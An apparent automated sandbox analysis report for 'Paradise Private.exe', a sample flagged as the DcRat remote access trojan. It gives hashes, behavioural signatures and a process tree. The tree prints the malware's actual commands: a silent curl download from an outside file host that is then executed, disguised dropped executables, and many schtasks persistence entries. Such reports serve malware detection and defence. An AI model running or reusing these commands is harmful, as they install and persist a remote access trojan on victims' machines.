Analysis
-
max time kernel
99s -
max time network
122s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241023-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
10-12-2024 11:15
Static task
static1
Behavioral task
behavioral1
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
Paradise Private.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
Paradise Private.exe
Resource
win10ltsc2021-20241023-en
General
-
Target
Paradise Private.exe
-
Size
855KB
-
MD5
df367e723dc5759cdad30841910cd6af
-
SHA1
eb6105e8f2462746108e94543e684c8d6a587dbb
-
SHA256
a29663d874e5fba50215d6966591407d6c9d264371ec0e726bdf5a902cf11156
-
SHA512
21f29b03a607ba8e3910ed27e802cf61db82dda0c1f3e9772127509dfd9eb7e81778463f47cbe4727116792eed83e11b91dc7fb72e455eb3b621201f9853dbb0
-
SSDEEP
12288:KvGAa5J2tubG6rOH7Fso6veRSN2ff+zOe9egX7AlGXynGnIr9BqiXb1FP:KvGAMAubGeo60OegX7AoXyn6m7Vj
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 18 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3024 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3032 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1852 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4772 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1652 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3136 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3680 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2768 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 740 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2844 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2708 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3720 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1364 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4732 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1804 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4600 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4776 5068 schtasks.exe 92 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 556 5068 schtasks.exe 92 -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation client.exe Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000\Control Panel\International\Geo\Nation chainreviewwinrefSvc.exe -
Executes dropped EXE 3 IoCs
pid Process 2388 client.exe 3296 chainreviewwinrefSvc.exe 4400 fontdrvhost.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 4 IoCs
description ioc Process File created C:\Program Files (x86)\Windows Media Player\Network Sharing\fontdrvhost.exe chainreviewwinrefSvc.exe File created C:\Program Files (x86)\Windows Media Player\Network Sharing\5b884080fd4f94 chainreviewwinrefSvc.exe File created C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe chainreviewwinrefSvc.exe File created C:\Program Files\Java\jre-1.8\lib\5b884080fd4f94 chainreviewwinrefSvc.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Speech\client.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language client.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000_Classes\Local Settings client.exe Key created \REGISTRY\USER\S-1-5-21-1263212995-3575756360-1418101905-1000_Classes\Local Settings chainreviewwinrefSvc.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3032 schtasks.exe 4600 schtasks.exe 556 schtasks.exe 1852 schtasks.exe 2768 schtasks.exe 2844 schtasks.exe 1364 schtasks.exe 1804 schtasks.exe 3024 schtasks.exe 1652 schtasks.exe 3136 schtasks.exe 2708 schtasks.exe 4776 schtasks.exe 4772 schtasks.exe 3680 schtasks.exe 740 schtasks.exe 3720 schtasks.exe 4732 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 884 Paradise Private.exe 884 Paradise Private.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe 3296 chainreviewwinrefSvc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3296 chainreviewwinrefSvc.exe Token: SeDebugPrivilege 4400 fontdrvhost.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 884 wrote to memory of 2152 884 Paradise Private.exe 83 PID 884 wrote to memory of 2152 884 Paradise Private.exe 83 PID 884 wrote to memory of 4996 884 Paradise Private.exe 84 PID 884 wrote to memory of 4996 884 Paradise Private.exe 84 PID 2152 wrote to memory of 2068 2152 cmd.exe 85 PID 2152 wrote to memory of 2068 2152 cmd.exe 85 PID 884 wrote to memory of 4512 884 Paradise Private.exe 88 PID 884 wrote to memory of 4512 884 Paradise Private.exe 88 PID 4512 wrote to memory of 2388 4512 cmd.exe 89 PID 4512 wrote to memory of 2388 4512 cmd.exe 89 PID 4512 wrote to memory of 2388 4512 cmd.exe 89 PID 2388 wrote to memory of 3392 2388 client.exe 91 PID 2388 wrote to memory of 3392 2388 client.exe 91 PID 2388 wrote to memory of 3392 2388 client.exe 91 PID 884 wrote to memory of 1644 884 Paradise Private.exe 93 PID 884 wrote to memory of 1644 884 Paradise Private.exe 93 PID 3392 wrote to memory of 4968 3392 WScript.exe 97 PID 3392 wrote to memory of 4968 3392 WScript.exe 97 PID 3392 wrote to memory of 4968 3392 WScript.exe 97 PID 4968 wrote to memory of 3296 4968 cmd.exe 99 PID 4968 wrote to memory of 3296 4968 cmd.exe 99 PID 3296 wrote to memory of 1232 3296 chainreviewwinrefSvc.exe 118 PID 3296 wrote to memory of 1232 3296 chainreviewwinrefSvc.exe 118 PID 1232 wrote to memory of 388 1232 cmd.exe 120 PID 1232 wrote to memory of 388 1232 cmd.exe 120 PID 1232 wrote to memory of 648 1232 cmd.exe 121 PID 1232 wrote to memory of 648 1232 cmd.exe 121 PID 1232 wrote to memory of 4400 1232 cmd.exe 122 PID 1232 wrote to memory of 4400 1232 cmd.exe 122 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
cURL User-Agent 1 IoCs
Uses User-Agent string associated with cURL utility.
description flow ioc HTTP User-Agent header 3 curl/8.7.1
Processes
-
C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"C:\Users\Admin\AppData\Local\Temp\Paradise Private.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:884 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Windows\system32\curl.execurl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe3⤵
- Drops file in Windows directory
PID:2068
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cls2⤵PID:4996
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\Speech\client.exeC:\Windows\Speech\client.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3392 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4968 -
C:\ComponentCrt\chainreviewwinrefSvc.exe"C:\ComponentCrt/chainreviewwinrefSvc.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\oWSuGkLVxs.bat"7⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\chcp.comchcp 650018⤵PID:388
-
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:648
-
-
C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe"C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe"8⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4400
-
-
-
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe2⤵PID:1644
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Recovery\OEM\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\OEM\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3032
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Recovery\OEM\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1852
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4772
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1652
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 5 /tr "'C:\Program Files\Java\jre-1.8\lib\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3136
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 12 /tr "'C:\Users\Default User\explorer.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\Default User\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2768
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "explorere" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\explorer.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:740
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Paradise PrivateP" /sc MINUTE /mo 8 /tr "'C:\Recovery\OEM\Paradise Private.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2844
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Paradise Private" /sc ONLOGON /tr "'C:\Recovery\OEM\Paradise Private.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2708
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "Paradise PrivateP" /sc MINUTE /mo 5 /tr "'C:\Recovery\OEM\Paradise Private.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3720
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\fontdrvhost.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1364
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4732
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\fontdrvhost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1804
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 11 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4600
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4776
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 12 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:556
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
98B
MD54dafd9e9509ac96be6aa5baec659da4d
SHA1a091552663ddea89536560f232b8339f318c9cbc
SHA2560c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf
SHA512d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132
-
Filesize
1.8MB
MD511cca9e2c6dc9c2a728b89e7314ec26a
SHA158aec3b662a1c4e8b43cc454d90813ac89b5e612
SHA256300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197
SHA512fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7
-
Filesize
207B
MD5b292d233456b16f26abc1aa07c9f5de0
SHA17b025705136101b5618d81d8ebf472335eebde43
SHA256e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d
SHA5121c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4
-
Filesize
225B
MD5f7d4ec12a202bd4e1afbd70b6a251956
SHA1b1879a51ea0e68ba72cf338d6f3af4e47bef7584
SHA2562ec9e8f9a2cb48e28d42f693fbb3d3b6ba671c380da298abe2d5a63176809ff9
SHA5129b05fdd2b8860bf29e60d184b8f513400585936fe94ec22cdb5b5e19409d25fe38cc7bf5d395757c485d3699fe5e3a581e36a7db3e2f1c1d25cc2e1fe450b0b8
-
Filesize
2.1MB
MD5bf4f13d82d217ed69d80124c50d9441c
SHA1b7ee7d109f61371342e924e6a0c3505347dd318f
SHA25651890bfc6f223014ff16f4bfa6ace8e2d2ec3c81eb6965406813b9ca32b08508
SHA5121ba17e55d6d1f6fda99daffe3f11f995d5e8434901b2aea9105728ccbff1b81727d96bf8811a62e8367fca0ec23bdea331165b001088b183281164269668d2f4